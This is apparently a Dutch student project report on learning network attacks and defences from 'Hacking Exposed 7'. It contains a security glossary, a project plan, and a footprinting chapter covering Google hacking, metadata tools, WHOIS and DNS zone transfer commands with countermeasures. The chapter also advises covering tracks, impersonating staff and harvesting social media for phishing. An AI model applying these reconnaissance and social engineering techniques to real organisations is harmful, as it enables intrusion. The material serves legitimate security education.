Firewall. Hierbij zal er naar de pakketten gekeken worden. Als de pakketten een bepaald soort pakket
zijn dan worden ze niet toegelaten door de firewall.
Authentication: bij authenticatie zal je identiteit gecontroleerd worden.
Authorsisation: bij autorisatie wordt aan de hand van je identiteit beslist welke rechten je krijgt op
het systeem.
Banner: als je connectie maakt met een poort zal er meestal een welkomstbericht of een errorbericht
te zien zijn. Een bericht dat je krijgt bij het connecteren met een poort krijgt, wordt een banner
genoemd.
Broadcast: dit is een bericht dat naar al de toestellen binnen het lokale netwerk gestuurd wordt. Dit
lokale netwerk wordt afgebakend door een router of Virtual Local Area Network (VLAN).
Broncode: broncode is de code waaruit een website is opgebouwd.
Brute-forcen: als je een wachtwoord wil achterhalen, probeer je zoveel mogelijk willekeurige
wachtwoorden uit. Dit doe je meestal aan de hand van een tekstbestand met mogelijke
wachtwoorden die je dan inlaadt in een bepaald programma.
CLI/opdrachtprompt: Command Line Interface, dit is een manier van interactie met een computer op
een tekst gebaseerde manier.
Client: in een client-server model is dit het toestel dat gegevens van de server vraagt.
Cryptographic Transaction Signatures: dit is een protocol dat ervoor zal zorgen dat je je eerst moet
bekendmaken vooraleer er een DNS update kan plaatsvinden. De DNS-server waarvan je de zone
transfer wilt van uitvoeren zal dan je identiteit controleren.
Data-link: dit is de tweede laag uit het OSI-model en zal zorgen voor het transport van data over een
verbinding. De adressering hierbij gebeurt op basis van het MAC-adres.
DHCP server: een DHCP server is een server die dynamisch IP-adressen zal uitdelen aan toestellen in
het netwerk.
Dial-in attack: in veel bedrijven wordt er gebruikt gemaakt van een dail-in methode om van op
afstand voor het bedrijf te werken. Door dit soort van aanval zou je als hacker kunnen binnendringen
in een netwerk.
DNS-server: het netwerk is opgebouwd uit IP-adressen. Om het voor de eindgebruiker gemakkelijk te
maken wordt er gebruik gemaakt van Domain Name Resolving. Dit zal een IP-adres “vertalen” naar
een website naam en omgekeerd. Een DNS-server is dus een server waar de zich de mapping bevindt
tussen de IP-adressen en de namen van de websites.
24
DOS aanval: dit is een Denial Of Service aanval, dit soort aanval heeft als doel om ervoor te zorgen
dat mensen die normaal iets moeten bereiken op een netwerk dit niet meer kunnen doen. Een
voorbeeld hiervan is als jij naar een website wil gaan en die website is down omdat er een DOS
aanval tegen plaatsvindt. In dit geval zal een persoon zoveel mogelijk connecties proberen te openen
met de webserver zodat deze geen nieuwe connecties meer aankan.
Exploit: dit is een kwetsbaarheid dit gebruikt wordt voor slechte doeleinden.
Firewall: een firewall is een systeem dat een netwerk beveiligd tegen aanvallen van buitenaf.
Gefilterde poort: dit is een poort dat gefilterd is door de firewall. Dit wil zeggen dat de firewall zo
ingesteld is om geen verkeer toe te laten via die bepaalde netwerkpoort.
Gesloten poort: een gesloten poort wil zeggen dat de service dat achter deze netwerkpoort zit niet
aanwezig is.
GUI: Graphical User Interface, dit is een manier van interactie met een computer op een grafische
manier.
Half open connectie: bij zo een connectie is er een deel van de three-way-handshake gedaan maar
niet helemaal. Hierdoor kan er geen verkeer verstuurd worden. Als er veel half-open connecties
openstaan op je toestel kan je ervan uitgaan dat er ofwel een netwerkscan uitgevoerd wordt ofwel
dat er een DOS aanval plaatsvindt.
HINFO: dit laat toe om het hardware type en besturingssysteem van een host bij te houden op een
DNS-server.
Hop: als je naar een website gaat op het internet zal je verschillende routers passeren voor je je
bestemming bereikt. Elke keer als je naar een volgende router gaat doe je een hop. Als gebruiker
merk je hier niets van.
Host: dit is een toestel dat zich bevindt op het netwerk.
HTML: Hyper Text Markup Language. Dit is de opmaaktaal voor websites.
Hub: een hub is een toestel dat al het verkeer dat naar hem gestuurd wordt zal doorsturen op al zijn
fysieke poorten.
IANA: Internet Assigned Numbers Authority, dit is een instantie dat de IP-adressen beheert over heel
de wereld.
Image/IOS: dit is het besturingssysteem van een netwerkapparaat.
Initiator: dit is het toestel dat de verbinding zal starten (initiëren).
Intrusion Detection System: dit is een systeem dat het netwerkverkeer zal analyseren en zo proberen
het verdachte verkeer te melden. Dit systeem zal het verdachte verkeer niet uit het netwerk halen
maar dit systeem zal enkel laten weten dat er verdacht verkeer is.
IP-adres: elk toestel dat verbonden is met het internet heeft een uniek IP-adres, dit is een
cijfercombinatie. Door middel van dit IP-adres kunnen de toestellen onderling communiceren.
ISP: Internet Service Provider, dit is een bedrijf dat ervoor zal zorgen dat de eindgebruikers op het
internet kunnen. Enkele voorbeelden in België zijn: Belgacom en Telenet.
Key: dit is een soort sleutel dat kan gebruikt worden bij het encrypteren van gegevens.
25
Loggen: het bijhouden van gebeurtenissen die doorgaan op de computer. Dit kan een foutenlog zijn
dat al de fouten die gebeuren op een computer bijhoudt.
Lookup requests: dit is de vraag van een naam voor een bijbehorend IP-adres te weten te komen.
Deze requests zullen afgehandeld worden door een DNS-server.
Metadata: dit is al de data dat zich rond een document bevindt. Enkele voorbeelden zijn de auteur,
de grootte en de datum dat het document aangemaakt is.
Multicast: dit is wanneer je een bericht stuurt over het netwerk naar meerdere van vooraf gekende
toestellen.
Nameblock: een blok aan IP-adressen met hun bijhorende naam in een DNS-server.
Namelookup: het opzoeken van een bijhorend IP-adres in een DNS-server.
Netwerkpoort: elke service die op je computer aanwezig is heeft een bijhorende poort. Als je naar
een website surft, zal je via poort 80 gaan. Dit is de poort van http.
Nonce: dit is een random gegenereerd nummer dat als het doorgestuurd wordt van de initiator naar
de responder ondertekend zal worden. Hierdoor kan de identiteit gewaarborgd woren.
Open poort: dit een poort waarachter zich een service bevindt. Als bijvoorbeeld poort 23 openstaat
dan weet je dat je dat toestel kan bedienen door Telnet te gebruiken.
Pakket: dit is binaire data dat door een computernetwerk gaat. Naargelang het protocol dat gebruikt
wordt zal het pakket een andere vorm en andere eigenschappen hebben.
Patch: als je een toestel patcht zal je een update uitvoeren waardoor de exploit teniet gedaan wordt.
Promicious mode: promicious mode is een toestand waarin je je NIC kan brengen om al het verkeer
dat voorbij komt af te luisteren.
Proxy server: een proxy server is een server waarlangs je kan gaan zodat een derde partij niet aan je
echte IP-adres kan geraken. Deze proxy server zal je een ander IP-adres geven.
Reply: dit is een antwoord, dit volgt meestal op een request.
Request: dit is een vraag, dit gaat meestal voor op een replay.
Responder: dit is het toestel dat zal antwoorden aan de initiator.
Reverse lookups: normaal gezien als je een lookup doet bij een DNS-server zal je vragen om een
naam om te zetten in een IP-adres. Je kan ook een IP-adres geven en wat de bijhorende naam is.
RIR: Regional Internet Register, dit zijn organisaties over heel de wereld dat IP-adressen zullen
uitdelen aan de verschillende ISP’s.
Root access: als je root acces bekomt, heb je toegang tot heel het toestel. Dit wil zeggen dat je alles
kan doen met dat toestel. Een voorbeeld is het jailbreaken van een IPhone.
Router: dit is een toestel dat zich op een network bevindt dat ervoor zal zorgen dat er connectiviteit
mogelijk is tussen verschillende netwerken.
Security association (SA): dit is een groep van beveiligingsmethoden.
26
Server: dit is een toestel waar een service op staat. Als jij naar een website surft zal je van jouw
computer (client) naar een andere computer (server) surfen. Wat je op je scherm te zien krijgt
download je eigenlijk van die server.
Sessie: een voltooide three-way-handshake.
Shell: een shell is een command prompt interface.
Sniffer: met een sniffer kan je netwerkverkeer afluisteren.
Statefull firewall: een statefull firewall zal onthouden naar welke website je geweest bent en zal
verkeer dat terugkomt van die bepaalde website doorlaten. Op deze manier wordt er geen verkeer
binnengelaten in het netwerk dat je zelf niet eerst gevraagd hebt.
Strings: dit is een opeenvolging van karakters. Je kan een string gebruiken als zoekterm in google om
zo resultaten te krijgen over toestellen dat kwetsbaar zijn.
Subnet mask: met een subnet mask word teen grootte van een netwerk beslist. Als je subnet mask
255.255.255.0 is dan kan je gebruik maken van 255 IP-adressen in je netwerk.
TCP header: een TCP header is een onderdeel van een pakket en bevat meestal de “source IP-adres”
en “destination IP-adres”.
TCP: dit is een soort netwerkpoort.
Three-way-handshake: dit zijn de drie stappen die doorlopen moeten worden voordat er een TCP-
connectie van start gaat.
UDP: dit is een soort netwerkpoort.
Unicast: bij een unicast zal je een bericht sturen aan maar één enkele host.
VLAN: dit is een Virtual Private Network, hiermee kan een broadcastdomein beperken. Je maakt
eigenlijk verschillende LAN’s die je dan later onderling met elkaar kan verbinden.
WHOIS pagina: dit is een pagina om de gegevens van een domeinnaam of IP-adres te achterhalen
door deze te zoeken in een databank.
27
Prince 2TM - Project Initiation Document
Project Name: Hacking Exposed Release Date
Author:
Callebaut Dries 24/01/2014 Boone Nathan
Owner:
Callebaut Dries Boone Nathan
Client:
iMinds (Van Maele Andy)
Document Number: 001
1 Project Definition Het project houdt in dat de twee teamleden met behulp van de methodiek "Hacking Exposed", dat
nauw aanleunt met het materiaal in het boek "Hacking Exposed 7" door de auteurs Stuart McClure,
Joel Scambray en George Kurtz, een goed begrip hebben van netwerkbedreigingen en de nodige
voorzorgsmaatregelen kunnen treffen om een een klein tot middelgroot netwerk te beveiligen.
De leerstof zal verder behandeld worden door zelfgemaakte cases, waarbij kennis aan te pas komt
die is vergaard door de methodiek te hebben bestudeerd.
2 Background iMinds is een bedrijf, o.l.v. de Vlaamse Overheid, dat veel onderzoek doet naar communiceren, en in
het bijzonder netwerkcommunicatie. Ze zijn benieuwd naar de mogelijkheden van hun "virtual wall",
en stellen dit ter beschikking voor geïnteresseerden. Hierdoor is het mogelijk dat ze projecten
voorstellen, waar studenten hun kennis kunnen testen.
Het project zal de deelnemers voorbereiden om een use case dat voldoet aan de eisen van niveau 6
te maken, wat vereist is om het project tot een goed einde te brengen.
3 Project objectives Netwerkaanvallen begrijpen en bestuderen
In een gecontroleerde testomgeving netwerkbeveiliging toepassen
Als hacker optreden om de zelfgemaakte netwerkbeveiliging te testen, en eventueel daarna
aan te passen
28
4 Desired outcomes In de eerste plaats zullen de teamleden de leerstof van “Hacking Exposed” begrijpen, zodat ze een
goede basis hebben om met de cases te beginnen.
Vervolgens zullen de teamleden de verschillende cases met succes afronden, en al hun bevindingen
noteren. Deze ervaring zal hun helpen bij toekomstige projecten en situaties.
Uiteindelijk zullen de resultaten van de cases enerzijds het succesvol infiltreren van een niet
beschermd netwerk zijn, en anderzijds het beveiligen van het netwerk zodat verdere pogingen tot
infiltreren mislukken.
5 Project scope and exclusions De volgende delen en hoofdstukken, zijn delen en hoofdstukken uit het boek “Hacking Exposed 7”.
In scope Out of scope Boek Hacking Exposed 7 bestuderen Een samenvatting van het boek
3 cases uitwerken omtrent netwerkbeveiliging
Deel 2 Hoofdstuk 4
Relevante leerstof en andere items noteren Deel 2 Hoofdstuk 6
Deel 1 Deel 3 Hoofdstuk 7 (alles buiten VPN)
Deel 2 Hoofdstuk 5 Deel 3 Hoofdstuk 9
Deel 3 Hoofdstuk 7 VPN Deel 4
Deel 3 Hoofdstuk 8
6 Constraints and assumptions Om de kwaliteit van het project te garanderen wordt er na elk doorgenomen hoofdstuk een
document gemaakt met daarin de meest interessante onderdelen.
Het domein dat de methode “Hacking Exposed” omvat is te breed. We zullen dus 5 cases bedenken
en hiervan zullen we er 3 uitwerken.
De einddatum is het einde van het eerste semester van het derde jaar Toegepaste Informatica
7 The user(s) and any other known interested parties Hogeschool Universiteit Brussel
De heer Andy Van Maele: opdrachtgever
De heer Yvan Rooseleer: opleidingshoofd
Serge Van Cleynenbreugel: Mentor
Dries Callebaut: student
Nathan Boone: student
29
8 Interfaces Voor we konden beginnen aan ons project was het noodzakelijk om het boek Hacking Exposed 7 in
ons bezit te hebben.
Voor de cases werd er een gecontroleerde testomgeving gecreëerd met behulp van
netwerkmateriaal behorende tot de Hogeschool Universiteit Brussel. Tot dit materiaal behoren
routers, switches, bijhorende kabels en het schoolnetwerk.
9 Project Approach Om ons project tot een goed einde te brengen hebben we fasering gebruikt.
• Fase 1: boek Hacking Exposed 7 onderzoeken en bestuderen, waarna belangrijke en
interessante delen genoteerd worden.
• Fase 2: 5 cases bedenken
• Fase 3: 3 cases uitwerken
10 Project Management Team Structure
Andy Van Maele
Opdrachtgever
Nathan Boone
Projectleider
Dries Callebaut
Projectleider
Gert Van CauwenbeghProjectbegeleider
Yvan Rooseleer
Projectbegeleider
Serge Van Cleynenbreugel
Project mentor
30
11 Role Descriptions Opdrachtgever: Andy Van Maele
Projectleider(s): Dries Callebaut en Nathan Boone
Mentor: Serge Van Cleynenbreugel
Project begeleider(s): Yvan Rooseleer en Gert Van Cauwenbergh
R: Responsible (verantwoordelijk)
A: Accountable (eindverantwoordelijk)
C: Consulted (geraadpleegd)
I: Informed (geinformeerd)
O: Out of loop (niet betrokken)
RACI-chart Opdrachtgever Projectleider Mentor Project begeleider
Cases maken I R A I I
Cases goedkeuren R A I I
PID maken O R A I I
PID goedkeuren O A R R
Project opvolgen O I R A
Leveren eindresultaat A R I I
12 Quality Management Strategy We zullen de kwaliteit van ons project garanderen door:
• Na elke stap uit de methodiek “Hacking Exposed” bestudeerd te hebben een document
opmaken waarin de belangrijkste zaken beschreven en uitgelegd staan.
• Verder zullen er op willekeurige momenten worden gevraagd aan de projectbegeleiders
om de huidige staat van de documentatie goed te keuren.
• Er worden 3 cases opgesteld, waarna deze voorgesteld worden aan de opdrachtgever om
de meest toepasselijke cases te vinden. Pas daarna voeren we de cases effectief uit. Dit
heeft als gevolg dat elke case over voldoende uitdagingen beschikt, maar tegelijkertijd
niet te moeilijk wordt.
• De versies van de projectdocumentatie worden individueel bijgehouden en individueel
voorzien van naamgeving.
31
13 Configuration Management Strategy • Het geheel van de documenten wordt gedeeld via Skydrive (https://skydrive.live.com/).
De gekozen teksteditor is Microsoft Word.
• Elke projectdeelnemer beheert over rechten om de documenten aan te passen en te
verwijderen.
• Versiebeheer wordt geregeld via manuele classificatie, waarbij de datum telkens wordt
meegedeeld samen met de naam van de editor.
• Wat we bespreken in de documenten zal via spontane vergaderingen worden beslist,
alsook tijdens de lessen "IT-project".
• Er zal een eenmalige vergadering gebeuren om de kwaliteit van de 5 cases te bespreken,
waarbij een scoringscriterium aan te pas komt en 3 cases uiteindelijk gekozen worden.
14 Risk Management Strategy Enkele risico’s verbonden aan ons project:
Risico Kans (max 10)
Impact (max 10)
Totaal (max 100)
Niet behalen deadline 5 8 40
Onvoldoende fysiek materiaal voor uitvoering cases
2 7 14
Verliezen van documenten 1 9 9
15 Communication Management Strategy De twee teamleden hebben allebei de verantwoordelijkheid om als team de projectmentor te
contacteren voor minstens één afspraak.
De communicatie gebeurt eenmaal per maand op een dag dat afgesproken wordt op de vorige
vergadering. De eerste vergadering zal gebeuren om de gevonden cases en voortgang van het project
te bespreken.
De informatie dat we bijhouden zijn de datums van de vergaderingen, samen met de afgesproken
punten. Analyse van stakeholders zal het eerste punt zijn dat zal besproken worden.
In het geval van vergadering met een derde persoon zal er telkens één noteerder zijn, terwijl het
andere teamlid de communicatie regelt. De middelen die worden gebruikt zijn pen en papier, of een
laptop indien aanwezig. De technieken die worden gebruikt richten zich op het snel en duidelijk
informeren tegenover de contactpersoon, zodat feedback vlot kan verlopen. Na elke vergadering
zullen de nota's overlopen worden door de teamleden, om te kijken of er niets over het hoofd is
gezien.
32
16 Project Plan Het project verloopt in drie fasen:
Fase 1: methodiek “Hacking Exposed 7” bestuderen
De methodiek “Hacking Exposed 7” zoals bestaat uit 4 grote stappen waarvan we 3 gaan bespreken.
Stap 1 Casing the Establishment
Footprinting: Het binnenbreken in een bedrijf om informatie te vergaren, samen met de
voorzorgsmaatregelen.
Enumeration: IP-adressen die gebruikt kunnen worden, poorten die openstaan, etc.. gebruiken om
zwaktes te vinden en analyseren.
Stap 2 Endpoint and Server Hacking
Hacking UNIX: Het uitvoeren van enkele technieken om FTP servers te hacken, samen met de
bijpassende verdedigingen.
Stap 3 Infrastructure Hacking
Twee soorten hacking worden hier besproken: VPN en Wireless Hacking. Ook hier worden
veiligheidsmaatregelen besproken.
Wij zullen stappen 1, 2 en 3 bestuderen en documenteren. We zullen dit doen door gebruik te maken
van Word documenten die gedeeld worden op Skydrive.
Fase 2: cases bedenken Als we het boek goed doorgenomen hebben zullen we cases bedenken. Deze cases zijn er zodat we
kunnen testen dat we de vergaarde informatie ook wel degelijk kunnen gebruiken.
We zullen de cases opmaken en dan aan elke case een score geven. De case met de hoogste waarde
zullen we als eerste maken.
Fase 3: cases uitwerken Als al de cases bedacht zijn en als er een score aan gegeven is kunnen we beginnen met de cases uit
te werken. Hiervoor zullen we als bron onze opgedane kennis uit het boek Hacking Exposed 7
gebruiken.
17 Project Controls Na elke fase die gedefiniëerd staat in “Project Plan” zullen we een deliverable maken.
Fase 1 Na elk hoofdstuk zal er een word document gemaakt worden met onderdelen die kunnen helpen
met het beter begrijpen van de methode "Hacking Exposed" uit het boek.
Fase 2 We zullen werken met een scoringscriterium. Door dit te gebruiken geven we elke case een waarde
van 1 tot 10, waarbij 1 het minst haalbare en 10 het meest haalbare. Dit gebeurt onder leiding van de
opdrachtgever.
Fase 3
De gekozen 3 cases zullen uitgewerkt worden in een virtuele en/of fysieke omgeving.
33
Stap 1: Footprinting 1 Inleiding Je kan niet zomaar ergens binnenbreken en beginnen te hacken, want dit zou tot weinig succes leiden.
Daarom is er een eerste stap, deze stap is het in kaart brengen van de onderneming of de persoon bij
wie je wilt inbreken. Als je wil inbreken in een huis moet je zeker ook eerst de omgeving analyseren
voor je zal kunnen toeslaan, anders zal je heel veel getuigen hebben, en aanwijzingen achterlaten. Dit
laatste is bij hacking het allerbelangrijkste, maar ook het moeilijkste. Iedereen kan hacken, maar de
persoon die geen sporen achterlaat is de beste hacker.
Terwijl je je opzoekingswerk aan het doen bent naar de persoon of onderneming in kwestie, is het
belangrijk dat je geen sporen achterlaat. Dit om te voorkomen dat ze weten dat er een aanval zal
plaatsvinden. Ze kunnen dan ook geen voorzorgsmaatregelen nemen tegen de bepaalde aanval die jij
wilt plegen.
2 Openbaar beschikbare informatie
2.1 Inleiding Er zijn verschillende manieren om meer te weten te komen over een bedrijf of een individu. Bij de ene
manier laat dit al meer sporen achter dan bij de andere. Hieronder zal ik verschillende manieren
bespreken.
2.2 Website
2.2.1 Commentaar Zo goed als elk bedrijf waarbij je zou kunnen binnenbreken heeft een website. Op deze website vind
je veel nuttige informatie. Je zal deze informatie niet meteen vinden als je de website bezoekt maar
wel als je naar de broncode kijkt. In deze broncode zal je soms commentaar terugvinden, in deze
commentaar zijn er meestal nuttige zaken verstopt. Enkele zaken die je in de commentaar zou kunnen
terugvinden zijn gegevens over wie de website gemaakt heeft, en andere zaken die de programmeur
er als geheugensteuntjes ingestoken heeft.
Je kan dit het beste doen door de gehele website te downloaden en hier dan in te zoeken naar de
commentaar (tags). In HTML= “<!-- -->”, in javascript= “//”.
UNIX/Linux: Wget (gnu.org/software/wget/wget.html) gratis
Windows: Teleport Pro (tenmax.com) betalend
2.2.2 Web Application Brute Forcing In de broncode van websites vind je soms ook verborgen mappen en bestanden. Het is moeilijk om
deze zaken terug te vinden met het blote oog dus bestaat hier software voor. DirBuster van owasp is
de software die we zullen gebruiken.
Je zal de website die je wilt brute-forcen moeten selecteren. Dan zal je een document moeten kiezen
met mogelijke verborgen mappen of bestanden en dan zal DirBuster de website scannen.
Deze manier van brute-force laat veel sporen achter, er is dus ook een ingebouwde functie om een
proxy in te stellen.
Windows, UNIX/Linux: DirBuster (owasp.org/index.php/Category:OWASP_DirBuster_Project)
34
2.3 Google Maps Je kan de exacte positie van een bedrijf te weten komen door dit bedrijf op te zoeken via Google Maps.
Zo achterhaal je de fysieke locatie.
Als je de fysieke locatie kent, kan je ter plaatse gaan en daar onderzoek doen naar het draadloos
netwerk. Je kan bijvoorbeeld onderzoeken hoe dat netwerk beveiligd is. Je kan ook proberen je voor
te doen als een medewerker of bezoeker en zo meer te weten komen over het bedrijf. Als ze je toelaten
in een vergaderzaal en als er daar netwerkaansluitingen ter beschikking zijn, kan je via deze weg op
het netwerk proberen te geraken.
2.4 Social Engineering Om meer te achterhalen over het bedrijf of een individu, kan je gebruik maken van “social
engineering”. Dit betekent dat je de vele sociale netwerksites kan aflopen en zoeken naar de
betreffende onderneming of persoon. Enkel sites die je kan bezoeken:
- Facebook.com
- Myspace.com
- Reunion.com
- Classmates.com
- Twitter.com
- Linkedin.com
- Plaxo.com
- Monster.com
- Careerbuilder.com
- Dice.com
- Ancestry.com
- Flickr.com
- Photobucket.com
De gegevens die je hiermee vindt, kunnen gebruikt worden bij het versturen van “phishing mails”. Dit
zijn persoonlijke mails met kwaadaardige links.
2.5 Google Hacking Database (GHDB) Google is een zoekrobot waar zeer veel informatie te vinden is. Er bestaan verschillende
zoekopdrachten waarmee je wachtwoorden kan achterhalen en foutief ingestelde servers kan
terugvinden. Deze zoekopdrachten zijn te vinden op de GHDB.
Windows, UNIX/Linux: http://www.hackersforcharity.org/ghdb
2.5.1 SiteDigger SiteDigger is een programma waarmee je het internet automatisch kan laten doorzoeken met strings.
Deze strings zijn te vinden in bovenstaande Google Hacking Database. Je kan ook een specifiek domein
of een specifieke site kiezen.
Windows, UNIX/Linux: http://www.mcafee.com/apps/free-
tools/termsofuse.aspx?url=/us/downloads/free-tools/sitedigger.aspx
35
2.6 FOCA 3.2 Foca is een programma waarmee je de metadata van een bestand kan analyseren. Je kan hiermee veel
te weten komen over de persoon die het document gemaakt heeft en over de programma’s die
gebruikt zijn om het document te maken. Door het programma FOCA3.2 zelf uit te testen heb ik
vastgesteld dat je er veel meer mee kan doen dan in het boek Hacking Exposed 7 beschreven staat. Zie
de screenshot hieronder voor meer informatie.
Figuur 2-1 FOCA 3.2 Metadata
Windows, UNIX/Linux: http://www.informatica64.com/foca.aspx
2.7 Shodanhq Shodanhq is een zoekmachine om te zoeken naar toestellen, gaande van thuisrouters tot grote
systemen die met het netwerk verbonden zijn.
Windows, UNIX/Linux: www.shodanhq.com
2.8 Forums Door te zoeken naar foute configuraties op Google of op forums, kan je veel te weten komen over
bedrijven. Het is mogelijk dat een netwerkbeheerder met een firewall aan het sukkelen is en om een
oplossing te vinden voor zijn probleem, de hele configuratie op het internet zet, zodat andere personen
hem kunnen helpen om fouten te vinden. Deze configuratie kan gevoelige gegevens bevatten, o.a. IP-
adressen, namen van gebruikers, enz.
2.9 Openbaar beschikbare informatie Tegenmaatregels Het is belangrijk dat je waar mogelijk informatie probeert te beperken. Dit is echter niet
gemakkelijk. Eens de informatie op het internet werd gezet, is het moeilijk om deze informatie weg te
halen. Wat je wel kan doen is de informatie aanpassen of valse informatie gebruiken zodat de
geïnteresseerden moeilijk de juiste gegevens vinden.
36
3 WHOIS and DNS Enumeration WHOIS is een manier om een IP-adres te traceren. Je kan dit IP-adres traceren tot bij de Internet Serivce
Provider (ISP) die het IP-adres uitgedeeld heeft. Eerst en vooral moet je beginnen bij Internet Assigned
Numbers Authority (IANA), dit is de internationale verdeler van IP-adressen. IANA zal deze IP-adressen
dan doorgeven en verdelen aan een bepaalde Regionale Internet Registers (RIR). Een RIR zal op haar
beurt de IP-adressen verder onderverdelen naar grote bedrijven en ISP’s. Als je op IANA naar een IP-
adres zoekt, dan zal je doorverwezen worden naar de WHOIS pagina van de RIR die het IP-adres
uitgedeeld heeft. Als je op de WHOIS pagina van deze RIR verder gaat zoeken zal je meer informatie
krijgen over het IP-adres. Je zal te weten komen wie dit IP-adres uitgedeeld heeft en je zult een
contactpersoon krijgen. Dit zijn de verschillende Regionale Internet Registers met hun bijhorende
WHOIS pagina:
IANA: http://www.iana.org/whois
ARIN: http://whois.arin.net/ui
LACNIC: http://lacnic.net/cgi-bin/lacnic/whois
AFRNIC: http://www.afrinic.net/en/services/whois-query
RIPE: https://apps.db.ripe.net/search/query.html
APNIC: http://wq.apnic.net/apnic-bin/whois.pl
37
3.1 Opzoeken van een IP-adres Tegenmaatregels Als een organisatie een range van IP-adressen aanvraagt of een domein laat registreren, moet
deze organisatie of individu informatie verschaffen aan de RIR. Al deze informatie is terug te vinden
als je een IP-adres opzoekt op de WHOIS pagina van de RIR. Een voorbeeld vindt je op de volgende
pagina: figuur 3-1 WHOIS pagina www.hubrussel.net.
Wat je kan doen als tegenmaatregel is de informatie die je verstrekt beveiligen.
Bv het telefoonnummer dat je opgeeft is een telefoonnummer dat extra beveiligd wordt zodat er geen
dial-in atttack kan plaatsvinden. Het beste wat je kan doen is een telefoonnummer en een e-mailadres
aanmaken dat alleen maar dient voor deze WHOIS pagina. De gegevens die je verstrekt kan je dan
observeren en op die manier te weten komen uit welke hoek er een aanval zou kunnen komen.
Je kunt op verschillende manieren de eigenschappen van je domein veranderen. Het is belangrijk dat
je de veiligste manier kiest, anders zou het kunnen dat je domein gehijacket wordt. Dit wil zeggen dat
ze al het verkeer naar je domein kunnen omleiden naar een ander domein.
Een veiligere manier om een domein op het internet te hebben is bij een domeinnaamverdeler een
domeinnaam te kopen. Jouw informatie is dan veilig, alleen de informatie van de provider van de
domeinnaam komt op de WHOS pagina. Een voorbeeld hiervan is:
http://www.godaddy.com/?isc=gtnieu50&ci=13333
Figuur 3-1 WHOIS pagina www.hubrussel.net
38
3.2 DNS Interrogatie
3.2.1 Zone transfers Een zone transfer bekent dat je een secundaire master server maakt waarmee je de zone database van
de primaire master overneemt. Dit kan je gebruiken voor redundantie: als de primaire master server
uitvalt, kan je de secundaire master server gebruiken als back-up. Het is dus een handig systeem, maar
bij sommige configuraties is dit niet goed beveiligd. Hierdoor kan een onbevoegd iemand een zone
transfer doen naar een fictieve secundaire master. Zo kan hij al de gegevens van die bepaalde DNS-
server verkrijgen. Met deze gegevens zou de aanvaller heel het interne netwerk in kaart kunnen
brengen.
Om een zone transfer te kunnen uitvoeren zal je op een netwerk moeten zijn waar lokaal een DNS-
server aanwezig is. Er zijn verschillende manieren om dit te doen, manueel kan je het programma
nslookup gebruiken die meestal meegeleverd is met Linux en Windows. Je kan ook geautomatiseerde
tools gebruiken zoals dig, host of Sam Spade.
We zullen nslookup starten in interactieve modus. Je opent de Command Prompt in Windows of de
terminal in Linux en dan typ je het commando nslookup:
nslookup
Het programma nslookup is nu gestart en het eerste wat hij laat zien is de standaard ingestelde DNS-
server. Als volgt definieer je de server naar wie je de zone transfer wilt uitvoeren, dus de secundaire
server.
192.168.1.1
Hiermee zeg je dat je al de dns gegevens wil hebben.
Set type=any
Met het volgend commando zal je al de gegevens van example.com nemen en die doorgeven aan het
bestand zone_out zodat je er hiermee later nog kunt werken. Met het punt dat na example.com komt,
maak je duidelijk dat het bij deze naam blijft.
Ls –d example.com. >\> /tmp/zone_out
Als volgt kan je in dit bestand zoeken naar mogelijk kwetsbare systemen. Je kan in dit bestand zoeken
naar interessante woorden zoals “test”, je kan dit doen met grep, sed, awk of perl. Hierdoor zal je meer
gegevens vinden over testomgevingen. Deze testomgevingen zijn meestal minder goed beveiligd dan
andere omgevingen.
Met de volgende tools kan je dit proces automatiseren:
Windows: Sam Spade (http://www.garykessler.net/library/is_tools_sam_spade.html )
UNIX/Linux: dig, host
Een andere goede tool om een dns-zone transfer te doen is dnsrecon. Deze tool zal een recursieve
DNS-zone transfer doen. Deze tool kan je downloaden via de volgende link:
https://github.com/darkoperator/dnsrecon
Bij al deze vorige tools moet de functie DNS-zone transfer aan staan op de primaire DNS-server. Dit is
niet altijd het geval. De tool die je alsnog kan gebruiken is fierce.
Het host commando kan je ook gebruiken om te weten te komen waar de mail server staat. Deze staat
meestal in hetzelfde netwerk als de firewall server. Waardoor je meteen een goede plaats hebt om je
aanval te starten.
39
3.2.2 DNS-zone transfer Tegenmaatregels Een goed tegenargument is om zone transfers alleen maar toelaten aan mensen die hiervoor
geautoriseerd zijn. Dit kan je doen door Cryptographic Transaction Signatures (TSIG) toe te passen.
Je kan eveneens de functie om zone transfers te doen volledig uitschakelen.
Je kan ook via een firewall alle inkomende connecties op TCP poort 53 weigeren, dit is de poort die
nodig is om een zone transfer uit te voeren. Dit omdat de meeste lookup requests UDP zijn en een
zone transfer is TCP.
Ondanks deze maatregelen is het nog altijd mogelijk om namelookups te doen. De aanvallers zouden
dan reverse lookups kunnen doen naar al de IP adressen van een nameblock. Hierdoor zou je externe
DNS-server nooit mogen configureren met informatie van het interne netwerk. Er wordt ook afgeraden
om HINFO te gebruiken.
4 Network Reconnaissance Nu onze zoektocht naar potentiele netwerken gedaan is, kan je proberen de topologie van het netwerk
te achterhalen. Je kan ook potentiële wegen vinden om tot in het netwerk binnen te dringen.
4.1 Tracerouting Traceroute is een tool waarmee je een IP pakket kan volgen. Per hop zal er uitleg verschijnen op je
scherm waar dit IP pakket passeert.
Als er in de output van traceroute een “Request timed out.” verschijnt, dan weet je dat op die plaats
het netwerk gefilterd wordt.
UNIX/Linux, Windows: traceroute (ftp://ftp.ee.lbl.gov/traceroute.tar.gz )
4.1.1 Hoe werkt traceroute? Traceroute gebruikt het TTL veld in het IP-pakket. Dit is het time to live veld, elke router waar dit pakket
passeert zal het time to live veld laten zakken met 1.
TTL begint aan 1, het pakket passeert de eerste router dus zet deze dit TTL veld gelijk aan 0. Hierdoor
stuurt deze router een ICMP TIME_EXCEEDED bericht terug.
Vervolgens is TTL 2, het pakket passeert dus terug de eerste router, deze verlaagt dit gegeven met 1
waardoor de TTL 1 is. Het pakket wordt dan nu doorgegeven naar de volgende router. Deze router zal
de TTL ook verlagen met 1 waardoor de TTL op 0 komt te staan. Deze router zal dan op zijn beurt een
ICMP TIME_EXCEEDED bericht terugsturen.
Het traceroute commando kan dan een volgend schema opbouwen door de IP pakketten te
analyseren.
40
GUI tools:
Windows: tcptraceroute (michael.toren.net/code/tcptracerouting )
Windows: Cain & Abel (oxid.it )
4.2 Network Reconnaissance Tegenmaatregels Er bestaan verschillende tools om te detecteren of iemand een scan doet van uw network. De
twee tools die ik zal bespreken zijn Network Intrusion Detection Systems (NIDS) en Intrusion
Prevention Systems (IPS).
4.2.1 NIDS Een NIDS is een systeem dat zal detecteren of er iemand een scan probeert uit te voeren op uw
